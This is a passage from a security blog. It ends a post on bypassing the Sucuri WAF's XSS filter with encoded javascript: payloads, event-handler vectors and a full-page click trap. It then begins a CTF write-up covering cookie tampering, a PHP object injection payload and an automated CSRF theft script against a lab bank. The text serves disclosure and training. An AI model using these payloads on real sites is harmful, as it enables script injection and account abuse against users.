<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh4RGOYE_4W8y76B1JuteF8CRwP5dAJ2eetnubdpb_eed-9oyh4Nk2sAxceZaZ94qhgavxEPPPOrikdPNRNjCqM5mMtE5H6fZeZEOxfm9byYR3lxG1UeyrsH1_AIrqldE8KAK3uQj__kvI/s1600/href.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh4RGOYE_4W8y76B1JuteF8CRwP5dAJ2eetnubdpb_eed-9oyh4Nk2sAxceZaZ94qhgavxEPPPOrikdPNRNjCqM5mMtE5H6fZeZEOxfm9byYR3lxG1UeyrsH1_AIrqldE8KAK3uQj__kvI/s1600/href.png" height="162" width="577" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
Here is how the input was being reflected.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjyUh81W9hgxI4vbxMcMWJdGNmF7XMdZZ_Ubb_7glMj9Xe795XpoHA6Ez9KxRm-qbVEh1gu6f_YuijKhyphenhyphenXcsHHML9Vyu2dyKtUgUYxesO7CtVMzPB8YW5NWCXdlxuR2Gw71xuRvug7ACbQ/s1600/3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjyUh81W9hgxI4vbxMcMWJdGNmF7XMdZZ_Ubb_7glMj9Xe795XpoHA6Ez9KxRm-qbVEh1gu6f_YuijKhyphenhyphenXcsHHML9Vyu2dyKtUgUYxesO7CtVMzPB8YW5NWCXdlxuR2Gw71xuRvug7ACbQ/s1600/3.png" height="30" width="577" /></a></div>
<br />
The next step was to use javascript, scheme to execute javaScript, however as expected it was being filtered out.<br />
<div>
<br /></div>
<br />
<b>http://www.site.com/shop.php?c=<span style="color: red;">"><a fooooooooooooooooooooooooooo href=javascript:alert(1)>CLICK</a></span></b><br />
<b><span style="color: red;"><br /></span></b>
<b><span style="color: red;"><br /></span></b>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhXAI1UOe2i5YBOaEPicuWsbyjGzw1kL0hH1P4gj3LIIzhJpZjGdjxLmJIBz5iC09aYupVmkr_hAyTJ9m7kUa2B6MBO0O6toONgAru0yvPp1q7qBV-MA9Zze6fAzoWRD0BYEB6-1jlrbTg/s1600/444.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhXAI1UOe2i5YBOaEPicuWsbyjGzw1kL0hH1P4gj3LIIzhJpZjGdjxLmJIBz5iC09aYupVmkr_hAyTJ9m7kUa2B6MBO0O6toONgAru0yvPp1q7qBV-MA9Zze6fAzoWRD0BYEB6-1jlrbTg/s1600/444.png" height="228" width="577" /></a></div>
<br />
The next step was to check if the regex is filtering out case sensitive payloads. However, it was also being filtered out.<br />
<b><br /></b>
<b>http://www.site.com/shop.php?c=<span style="color: red;">"><a fooooooooooooooooooooooooooo href=javAsCript:alert(1)>CLICK</a></span></b><br />
<br />
The following test was made to check if the regex was looking for a colon followed by javascript keyword.<br />
<br />
<b>http://www.site.com/shop.php?c=<span style="color: red;">"><a fooooooooooooooooooooooooooo href=javAsCript:>CLICK</a></span></b><br />
<b><br /></b>
With above test it was clear that the regular expression is looking for "Javascript" keyword followed by a "Colon". This could be easily defeated by using HTML entities such as<b> &sol &tab &colon &NewLine</b>. Apart from that parenthesis were also being blocked which could also be easily bypassed by using their corresponding html entities i.e. <b>&lpar;</b> and <b>&rpar;</b>.<br />
<br />
Inside of href attribute &colon; could be used instead of "<b>:</b>" which would be decoded by the browser at the run time.<br />
<br />
<b>http://www.site.com/shop.php?c=4<span style="color: red;">"><a fooooooooooooooooooooooooooo href=javAsCript&colon;test>CLICK</a></span></b><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhu8CSxBAz-d3TYqFBPtCX3fl8MBWyAKNKuDHWXOMszPV4PhLtUZ3cPZSoyg3y4PZ5Y2Tf-QCrpngcDpgOkQBen8QGrvHlc5Uf6Pa8A0qFnjjXe29opAQkZUzvE6LaqQrxQjo2-Y7cUZz0/s1600/2222.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhu8CSxBAz-d3TYqFBPtCX3fl8MBWyAKNKuDHWXOMszPV4PhLtUZ3cPZSoyg3y4PZ5Y2Tf-QCrpngcDpgOkQBen8QGrvHlc5Uf6Pa8A0qFnjjXe29opAQkZUzvE6LaqQrxQjo2-Y7cUZz0/s1600/2222.png" height="312" width="577" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
However, as could be seen from the above figure the html entities are not being reflected back. This could be easily defeated by using hex encode to encode <b>&</b> and<b> ; </b>signs.<br />
<h4>
Full Bypass</h4>
Combining all pieces of puzzle leads to full bypass:<br />
<br />
<b>http://www.site.com/shop.php?c=4"<span style="color: red;">><a fooooooooooooooooooooooooooooooooo href=JaVAScript%26colon%3Bprompt%26lpar%3B1%26rpar%3B%></span></b><br />
<b><br /></b>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjhG475PufOkGpqAcdxMLNKDcBZUbgIe7CC9A-dy1lr3oh1jOoNqXwjs59OoTSdSJ9rnHTf_Y3ZEDM9Rp_gX53PBK_G1rn1r5EDoqNlu0YIU4_mby_oQveW1l9kEsKK9-oV8e-bh3CWPFw/s1600/77.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjhG475PufOkGpqAcdxMLNKDcBZUbgIe7CC9A-dy1lr3oh1jOoNqXwjs59OoTSdSJ9rnHTf_Y3ZEDM9Rp_gX53PBK_G1rn1r5EDoqNlu0YIU4_mby_oQveW1l9kEsKK9-oV8e-bh3CWPFw/s1600/77.png" height="332" width="577" /></a></div>
<b><br /></b>
<br />
<h4>
Ethical Considerations</h4>
Both the website owner and the vendor has been notified about the vulnerability.<br />
<h4>
In Closing</h4>
WAF's should only be considered as an additional layer of protection not a primary layer of protection. Due to the fact that rely upon blacklist, in almost all the situations it's possible to bypass them.<br />
<br />
<b>Update 1:</b> It seems like Sucuri has just blocked "<b>Prompt</b>" keyword, the following vector bypasses it - <b> <a%20x%20href=javascript%26%2358%3Bprompt(1)>a</a> </b> <b>credits<span style="color: red;"> @mmrupp</span></b><br />
<b><span style="color: red;"><br /></span></b>
<b>Update2:</b> It seems like securi is now blocking "Prompt" as well as the "Confirm" keyword, the following vector bypasses it -<br />
<b><br /></b>
<b> <q oncut=\u0070rompt(2)> </b><br />
<b>"><p id=""onmouseover=\u0070rompt(1) //</b><br />
<b><br /></b>
<b>Update 3: </b> @soaj1664ashar found another way to bypass the filter:<br />
<br />
<b>"><p id="\u0070rompt(1)"onmouseover=\u0065val(id) //</b><br />
<br />
<b>Update 4: </b>Mathias Karlson used a neat trick to yet again bypass Sucuri XSS filter, he figured out that a="b" i added a little bit of css magic to make user interaction unavoidable.<br />
<br />
<a id="a"href=javascript&colon;alert&lpar;1&rpar; id="a">Click</a><br />
<h4>
Unavoidable User Interaction</h4>
The above bypass could be combined with with css magic to bypass it with unavoidable user interaction.<br />
<b><br /></b>
<b><a+id="a"href=javascript%26colon;alert%26lpar;1%26rpar;+id="a" style=width:100%25;height:100%25;position:fixed;left:0;top:0 x>Click me plz</a></b></div>
<script>
location.href="http://www.rafaybaloch.com/2017/06/sucuri-waf-xss-filter-bypass.html";
</script>
Rafayhttp://www.blogger.com/profile/15944091083959815608noreply@blogger.com1tag:blogger.com,1999:blog-3121270199089759062.post-81238480427176602702015-04-18T00:31:00.001-07:002020-05-27T14:32:44.251-07:00CSP 2015 Capture The Flag Writeup <div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjub93URWW5oLhwJSwL2YIK6h9zcIZVETRSmD5jGeEJYLuNLtiLIGy7F4nIa4uIyyKR60N9jRZ68Vi4NksA1xDDpHamW4nBqL7oXV_m497W4RO3wJeBleLklvdqe6kr36YnDJGyJGop7jQ/s1600/ctf.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjub93URWW5oLhwJSwL2YIK6h9zcIZVETRSmD5jGeEJYLuNLtiLIGy7F4nIa4uIyyKR60N9jRZ68Vi4NksA1xDDpHamW4nBqL7oXV_m497W4RO3wJeBleLklvdqe6kr36YnDJGyJGop7jQ/s1600/ctf.png" height="284" width="320" /></a></div>
<br />
On 11th April <b>Giuseppe Trotta</b> and myself organized a CTF (Capture The Flag) competition for <b>Cyber Secure Pakistan</b> (A conference that combines all the stakeholders). The challenge was hosted on hack.me and contained 9 different challenges, some challenges itself contained sub-challenges. Overall, we received great feedback from vast majority of participants. No one was able to solve all the challenges within the given time frame, however a day or two we noticed that a team of "<b>Sajjad</b>" and "<b>MakMan</b>" was able to solve the challenge, and they were kind enough to do the writeup for the challenge, so over to Sajjad for the writeup.
<br />
<a name='more'></a><br />
I teamed-up with a very talented friend of mine to solve the challenges. He goes by the nickname "<b>MakMan"</b> and possesses extra-ordinary problem solving and penetration testing skills. We solved almost all challenges together.
I want to keep this write-up precise, so I would not ramble on much about what I tried and failed. I will rather explain what steps I went through in each of the challenges to exploit the vulnerability and capture its flag. I am going to explain them in descending order where order is the time I had to spend to solve the challenge.<br />
<br />
<u>Note:</u> You might notice that I didn't use threading in any of my scripts to make them work faster. The reason is that I was afraid of getting my I.P address banned by the server for sending requests too fast; I was also afraid of overloading the server by sending too many requests at a time. And in some scenarios, it was not feasible to use threading.<br />
<h4>
9. Authentication Bypass (via cookie manipulation)</h4>
<br />
<div class="separator" style="clear: both; text-align: left;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg4wa49ZAgh-xqTjVJBCBek56c3rTX92eAux51DVDhcEYhQ-zP1xmYTz98qQQA_thewTdm3g12n1H0Ui15DFwJ3bJLifoDXw8gWvykPIHhkBWEAFECb3qTsiRGZDbpjFRG1FYq9PkAN_Po/s1600/1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg4wa49ZAgh-xqTjVJBCBek56c3rTX92eAux51DVDhcEYhQ-zP1xmYTz98qQQA_thewTdm3g12n1H0Ui15DFwJ3bJLifoDXw8gWvykPIHhkBWEAFECb3qTsiRGZDbpjFRG1FYq9PkAN_Po/s1600/1.png" height="124" width="577" /> </a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
This was the very first challenge I attempted in this CTF and upon solving it, I found it to be the easiest. A simple sign-in page was provided on main page (index.php) which can be seen in the screenshot below.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiNjnTBLhnJNwC5XI8w0uJoH1bTFNZPWR1Xe4NclyXvuxEHYuFLc4l7lxYX3H96PkNd94ZBXjQOa1ZN0VMAFR9XaeJwSECMH-QB77NpJk-2M2DnSnpuKse9bEmJHZ3hahtuCk7IDIWpFc4/s1600/1.1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiNjnTBLhnJNwC5XI8w0uJoH1bTFNZPWR1Xe4NclyXvuxEHYuFLc4l7lxYX3H96PkNd94ZBXjQOa1ZN0VMAFR9XaeJwSECMH-QB77NpJk-2M2DnSnpuKse9bEmJHZ3hahtuCk7IDIWpFc4/s1600/1.1.png" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
At first, I expected it to be simple SQL injection (<i>x' or 'x'='x</i>) bypass; but it didn't take long for me to figure out that that was not the case, so I started with analyzing the headers and cookies and found an interesting cookie named "admin" with its value set as '<b>0</b>'. At this point, I became sure that it was a <b>cookie manipulation vulnerability</b>, so I simply modified the cookie value and set it to '<b>1</b>'. After that, all I had to do was submit the form with any username and password values. Below screenshot shows the result of the form submission after cookie manipulation.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiEaQRGUL_D_LNAAEQBUOqcVTkXjC30JOt0d9Zb1L2zbJRMFK7niicDBt-9RLjnIqCgsmDn0tntw25lKeamLCwu0ybDatYGoD_oX3hcu0eiG9jG8aPJm5x68Ob7shmD61w6kfwA8gq-H7Y/s1600/Screenshot_1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiEaQRGUL_D_LNAAEQBUOqcVTkXjC30JOt0d9Zb1L2zbJRMFK7niicDBt-9RLjnIqCgsmDn0tntw25lKeamLCwu0ybDatYGoD_oX3hcu0eiG9jG8aPJm5x68Ob7shmD61w6kfwA8gq-H7Y/s1600/Screenshot_1.png" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
</div>
<div class="separator" style="clear: both; text-align: left;">
The MD5 hash of this key was the flag for this challenge.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
</div>
<h4>
8. PHP Object Injection (via "unserialize" function)</h4>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEijvXTJV8bGpRavv5BlwE1GZ6AyGEfuOYZxoxbY4SYe74p3VL5jkiFqXTFzAsB3y5gbR10ajvTuVzkvatuOJbBZRZJk5L1qkD0mmN3nhNh9PNN4C2Ylcdy40TwGGjcAnWrwMuU0ZsvrvME/s1600/Screenshot_2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEijvXTJV8bGpRavv5BlwE1GZ6AyGEfuOYZxoxbY4SYe74p3VL5jkiFqXTFzAsB3y5gbR10ajvTuVzkvatuOJbBZRZJk5L1qkD0mmN3nhNh9PNN4C2Ylcdy40TwGGjcAnWrwMuU0ZsvrvME/s1600/Screenshot_2.png" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
This challenge had 300 points which in my opinion, it did not deserve. It was a simple PHP Object injection which I believe (according to my limited knowledge) can only be exploited if the some information of the source code is known. At first, the source code was not provided; even the class name (which had exploitable magic method) was not mentioned. Later, the source code was provided which made it a very easily solvable challenge.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Anyway coming back to the agenda... The main page (unserialize.php) of this challenge had a form which can be seen in the screenshot below.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3J9yU9CCcIOZDiN3kUe1FRAi2TIvA_fGCP0mDSelE8EMrwx9sqlhCyA12hd2vlTBTZRvt7pvSrVAzw-CAlLKuQ5iZBs1vwM0Ri-rt6k5iAX8jNyZWXLA3aOgsCEn6zEdMVzbZIFUwzo0/s1600/Screenshot_3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3J9yU9CCcIOZDiN3kUe1FRAi2TIvA_fGCP0mDSelE8EMrwx9sqlhCyA12hd2vlTBTZRvt7pvSrVAzw-CAlLKuQ5iZBs1vwM0Ri-rt6k5iAX8jNyZWXLA3aOgsCEn6zEdMVzbZIFUwzo0/s1600/Screenshot_3.png" /> </a></div>
<div class="separator" style="clear: both; text-align: left;">
And here is the given source code:</div>
<blockquote class="tr_bq">
<div class="separator" style="clear: both; text-align: left;">
<span style="color: blue;">http://pastebin.com/raw.php?i=g2NQbr8P</span></div>
</blockquote>
From the source code, it can clearly been seen that the direct user input is being passed to the unserialize function which is a security risk and results in a code execution. It can also be seen that a vulnerable magic method "__destruct" exists in the class named "CreateFile" which exists in the same context (or file) as the unserialize function.<br />
<br />
Here is the vulnerable line of code:<br />
<blockquote class="tr_bq">
<span style="color: red;">readfile(dirname(__FILE__) . '/' . $this->tmpfile); </span></blockquote>
Anybody having basic understanding of the objection injection vulnerability would know that he can set the values of the class properties according to his will by exploiting the "unserialize" function via input. Thus, we can set the value of "tmpfile" which would be the member of the current class instance.<br />
<br />
So here is the input payload I submitted which resulted in Local File Disclosure.<br />
<blockquote class="tr_bq">
ss
<span style="color: red;">O:10:"CreateFile":1:{s:7:"tmpfile";s:15:"unserialize.php";}</span></blockquote>
For anyone (not familar with serialization), here is the code I wrote to generate this payload.<br />
<blockquote class="tr_bq">
<span style="color: blue;">http://pastebin.com/raw.php?i=FkUFveGp </span></blockquote>
A "KEY" was defined in the source code of unserialize.php.<br />
<br />
The MD5 hash of that key was the flag for this challenge.<br />
<div class="separator" style="clear: both; text-align: left;">
</div>
<h4>
7. Cross-site Request Forgery (CSRF)</h4>
<div class="separator" style="clear: both; text-align: left;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgp8rFUWt3ehoeNcwzll1hd2XVux0yByzSPAN7kb3peAxPvY58gilk7fQ8zcQIWTN-GbaKAmlNquD4tasMMQbwuJo6Oj5n2UErjUcnS24iJXx64X84C61s-SfaBBTGOA7vpGRx05cNqjTo/s1600/Screenshot_4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgp8rFUWt3ehoeNcwzll1hd2XVux0yByzSPAN7kb3peAxPvY58gilk7fQ8zcQIWTN-GbaKAmlNquD4tasMMQbwuJo6Oj5n2UErjUcnS24iJXx64X84C61s-SfaBBTGOA7vpGRx05cNqjTo/s1600/Screenshot_4.png" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<b><br /></b></div>
<div class="separator" style="clear: both; text-align: left;">
This scenario of this challenge seemed unrealistic to me for many reasons. But who cares, right? The goal was to solve the challenge which I did.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
So the below hint was provided in the challenge details.</div>
<blockquote class="tr_bq">
<div class="separator" style="clear: both; text-align: left;">
<span style="color: #b45f06;">Hint: It's awesome when other people do things for you, isn't it?;)<br />The simulation of this hint, so the biggest part of this challenge is at "fake_user.php" file</span></div>
</blockquote>
And the credentials of a user account were also given.<br />
<br />
The URL provided for this challenge had a small web application for bank
management. There was a login page which can be seen in the screenshot
below.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj_k3oSuCGC3ggOJhoPN4QbMl-bPv763Z0pwB3PZ6R8PJs8yMt_Dz3kDkkbVH4PZeYZ3eKEuhX1kXPH2v7ChVS6LszZJV2QWwgsCJntsgARjXYmc9SmdIG1avcha26C3fYN5__IfCVT8eg/s1600/Screenshot_5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj_k3oSuCGC3ggOJhoPN4QbMl-bPv763Z0pwB3PZ6R8PJs8yMt_Dz3kDkkbVH4PZeYZ3eKEuhX1kXPH2v7ChVS6LszZJV2QWwgsCJntsgARjXYmc9SmdIG1avcha26C3fYN5__IfCVT8eg/s1600/Screenshot_5.png" height="459" width="577" /></a></div>
<br />
So I logged in using the provided credentials and noticed that a donation page existed which could be used to donate money to other members in the bank.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjElri1CrTXlskj9_GQPQvjWCy9i6obfV7r0qLgkrXNKWRfq3Mxn4sasTnx7CR5DrAegpT-ySFgXPKFjIxU_CqqEfzCQcOSGk9JgtBG8RVrP0SZ_J9w6vFH3VXcVLeYG2ZxHmLuWkbBxj8/s1600/Screenshot_6.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjElri1CrTXlskj9_GQPQvjWCy9i6obfV7r0qLgkrXNKWRfq3Mxn4sasTnx7CR5DrAegpT-ySFgXPKFjIxU_CqqEfzCQcOSGk9JgtBG8RVrP0SZ_J9w6vFH3VXcVLeYG2ZxHmLuWkbBxj8/s1600/Screenshot_6.png" /></a></div>
<div dir="ltr" style="text-align: left;" trbidi="on">
The goal of this challenge was to become the richest in the bank. The user whose credentials were provided had $10 in account. And it was mentioned that the current richest person in the bank has <span class="color1">$1131.</span><br />
<span class="color1"><br /></span></div>
<div dir="ltr" style="text-align: left;" trbidi="on">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiPbVGHZpjzC59ItnaTlgsBAlMhH31cImldwh9tmWgxwpzM6aPIXkejz6FwrFg39ypdPQTejVVVS3TLzbUq8u0H2TeaZk4U2TR2kXmiqa9gfwh-Znq-V1fIamFTBfzfGZw75AX1f_tWxaA/s1600/Screenshot_7.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiPbVGHZpjzC59ItnaTlgsBAlMhH31cImldwh9tmWgxwpzM6aPIXkejz6FwrFg39ypdPQTejVVVS3TLzbUq8u0H2TeaZk4U2TR2kXmiqa9gfwh-Znq-V1fIamFTBfzfGZw75AX1f_tWxaA/s1600/Screenshot_7.png" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div dir="ltr" style="text-align: left;" trbidi="on">
</div>
<div dir="ltr" style="text-align: left;" trbidi="on">
</div>
<div dir="ltr" style="text-align: left;" trbidi="on">
<span class="color1"> Oh and </span>there is a donation page? At this point I knew that it was the donation system which would be vulnerable. So I donated $5 to a random person (who shouldn't be tankful to me) to learn how it worked. <br />
<br />
It was discovered that that a request was generated to a page "sendmoney.php" with GET parameters that included sender, receiver, amount, etc. The original parameter names can be seen in below link:<br />
<br />
<blockquote class="tr_bq">
<span style="color: blue;">/sendmoney.php?frommemberID=99999&memberID=1&member=John Smith&ammount=5 </span></blockquote>
I tried to tamper the "frommemberID" parameter but the result was not a success. It seemed like the donation page was checking whether the "frommemberID" value matches with that of currently logged in user. The resulting page had this message:<br />
<blockquote class="tr_bq">
<span style="color: #b45f06;">So you want to steal money?? This is not the correct way!</span></blockquote>
Then I remembered the hint i.e. fake_user.php. That page was a user simulator. It also had other (a little too much) information. Here is the information which was mentioned there:<br />
<br />
<blockquote class="tr_bq">
<span style="color: #b45f06;">Welcome CSRF Master!</span> <span style="color: #b45f06;"><br />As you already know, the donation form is vulnerable to CSRF. </span> <span style="color: #b45f06;"><br /> You also know, that to become the richest in the bank and win the gorgeous prize you must steal some money from all the members in the bank. <br /> Hey, not too much...max $5 (the donation budget)! </span> <span style="color: #b45f06;"><br /> We know, and you too, that to do a CSRF attack we need a victim that follows our links. <br /> Well, to simplify we have made the following form. </span><br />
<br />
<span style="color: #b45f06;">This form simulate a user logged in his members area that clicks on a given link.</span></blockquote>
Below this text, was a form which had a field to input the URL which victim would visit. To cut to the chase, the donation URL was meant to be submitted in the form on "fake_user.php" page. So I tested it by pasting the same URL that I had tried directly earlier and here was the result:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhyNNT8E7xFztcUT5L5IP-xi6phjQO7yBfT4mdLPIe3JsY5snPjTF4jqC2IPYuyjam8VuDY0osvjeFlbX5zOdEWgNcIUMa5SvQRBQngbO1chOYHrSEJ-FtZRvK3jQfVv_zpWOR-aOLYc6I/s1600/Screenshot_8.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhyNNT8E7xFztcUT5L5IP-xi6phjQO7yBfT4mdLPIe3JsY5snPjTF4jqC2IPYuyjam8VuDY0osvjeFlbX5zOdEWgNcIUMa5SvQRBQngbO1chOYHrSEJ-FtZRvK3jQfVv_zpWOR-aOLYc6I/s1600/Screenshot_8.png" /></a></div>
</div>
<div dir="ltr" style="text-align: left;" trbidi="on">
Then I checked the balance and it now had $5 more than the previous balance i.e. $10 which means in total it had $15. Now I had to steal another $1132 in order to be the richest in the bank. And $1132 divided by $5 (max donation amount allowed) equals 228 (users) but I already had $15 so 228 minus 15 = 212; this was the amount to users I had to steal from. It would have taken a long time submitting each URL manually (to steal $5 from each of the 212 users). So I coded a little PHP script which automated the task.<br />
<br />
Here is the code of that script:<br />
<blockquote class="tr_bq">
<span style="color: blue;">http://pastebin.com/raw.php?i=QbXDbJhp</span></blockquote>
So after executing the script, I checked the balance page and this was the result:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiKnyVA2uZR4eXOihyPLk47ZoXEaOdaGBT3VzyBGnRaNqbL2zgat8Bg4ZYbUBo9S3C8Db9PNQh4QE6NLF2TvqNvWbLbkzD8IZVJ9ARKjEXrZk0Q0uVFX_roCnjuVejVxYJe_Ynuf6eTDWw/s1600/Screenshot_10.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiKnyVA2uZR4eXOihyPLk47ZoXEaOdaGBT3VzyBGnRaNqbL2zgat8Bg4ZYbUBo9S3C8Db9PNQh4QE6NLF2TvqNvWbLbkzD8IZVJ9ARKjEXrZk0Q0uVFX_roCnjuVejVxYJe_Ynuf6eTDWw/s1600/Screenshot_10.png" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
</div>
<div dir="ltr" style="text-align: left;" trbidi="on">
The MD5 checksum of the image displayed on the page was the flag for this challenge.<br />
<div class="separator" style="clear: both; text-align: left;">
</div>
<h4>
6. Authentication Bypass (SQLi)</h4>
</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj4EfFPbEVU21IrXsH7smh0kynI8qYIU4otwY8fX_DIktcklYobd-xKUqUaazBKbl1xWeIlz_YPzi9-fAuPUQIZBOtaGlsXLvMCtAD6UHCwBqkBkYHN-gwfbf8PpwOjuJjeoxGyyN6ZC3I/s1600/2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj4EfFPbEVU21IrXsH7smh0kynI8qYIU4otwY8fX_DIktcklYobd-xKUqUaazBKbl1xWeIlz_YPzi9-fAuPUQIZBOtaGlsXLvMCtAD6UHCwBqkBkYHN-gwfbf8PpwOjuJjeoxGyyN6ZC3I/s1600/2.png" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
This challenge seemed more interesting than the previous bypass challenge (#9 in this list). Just like that challenge, a sign-in form could be seen on the front page (index.php).</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjTx5r09CnD4g3praUjtGOWA9-iU4i1BhEZJ4DRAmjPzxJis_TyHJXkCDdrXVVVgwlPXXrIoxf1snX-AhjVeFWAoHm-ospRgFVlealTi3F8UQal3p1VQvlZzBBgFJlg7y-McwD2QozixqQ/s1600/2.2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjTx5r09CnD4g3praUjtGOWA9-iU4i1BhEZJ4DRAmjPzxJis_TyHJXkCDdrXVVVgwlPXXrIoxf1snX-AhjVeFWAoHm-ospRgFVlealTi3F8UQal3p1VQvlZzBBgFJlg7y-McwD2QozixqQ/s1600/2.2.png" height="301" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
An ajax call to 'login.php' with POST parameters ('username' and 'password') was generated upon submitting the form. At first I expected it to be an easily discoverable but tricky SQL injection vulnerability but it turned out to be the opposite.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
